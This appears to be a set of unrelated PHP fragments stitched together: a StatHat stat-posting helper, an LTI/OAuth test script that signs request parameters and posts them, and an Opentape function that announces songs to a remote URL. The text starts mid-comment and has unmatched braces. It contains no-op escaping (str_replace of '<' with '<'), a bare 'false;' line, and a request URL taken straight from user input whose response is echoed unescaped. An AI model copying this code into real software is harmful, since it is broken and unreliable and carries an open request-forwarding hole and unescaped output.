* @param mixed $email
* @param mixed $stat_name
* @param mixed $value
* @return void
*/
function stathat_ez_value_sync($email, $stat_name, $value)
{
return do_post_request("http://api.stathat.com/ez", "email={$email}&stat={$stat_name}&value={$value}");
}
} else {
exit;
}
}
}
if (!isset($_REQUEST['setting'])) {
exit;
}
$url = 'http://localhost:8080/imsblis/service/';
$url = $_REQUEST['url'];
$data = array('lti_message_type' => $message, 'id' => $_REQUEST['id'], 'setting' => $_REQUEST['setting']);
$oauth_consumer_key = $_REQUEST['key'];
$newdata = signParameters($data, $url, 'POST', $oauth_consumer_key, $oauth_consumer_secret);
echo "<pre>\n";
echo "Posting to URL {$url} \n";
ksort($newdata);
foreach ($newdata as $key => $value) {
if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}
print "{$key}={$value} (" . mb_detect_encoding($value) . ")\n";
}
global $last_base_string;
echo "\nBase String:\n</pre><p>\n";
echo $last_base_string;
echo "\n</p>\n<pre>\n";
$retval = do_post_request($url, http_build_query($newdata));
$retval = str_replace("<", "<", $retval);
$retval = str_replace(">", ">", $retval);
echo "Response from server\n";
echo $retval;
function announce_songs($songlist_struct)
{
global $REL_PATH;
$ts = time();
$prefs_struct = get_opentape_prefs();
$json = new Services_JSON(SERVICES_JSON_LOOSE_TYPE);
$version_struct = $json->encode($songlist_struct[get_tape_path()]);
$data = http_build_query(array('version' => constant("VERSION"), 'url' => get_base_url(), 'songs' => $version_struct));
$result = do_post_request(constant("ANNOUNCE_SONGS_URL"), $data, null);
if (!strcmp($result, "OK")) {
} else {
error_log("Failed to announce songs to " . constant("ANNOUNCE_SONGS_URL") . " result was: " . $result);
}
$prefs_struct['last_announce_songs'] = $ts;
if (write_opentape_prefs($prefs_struct)) {
return $prefs_struct;
} else {
false;
}
}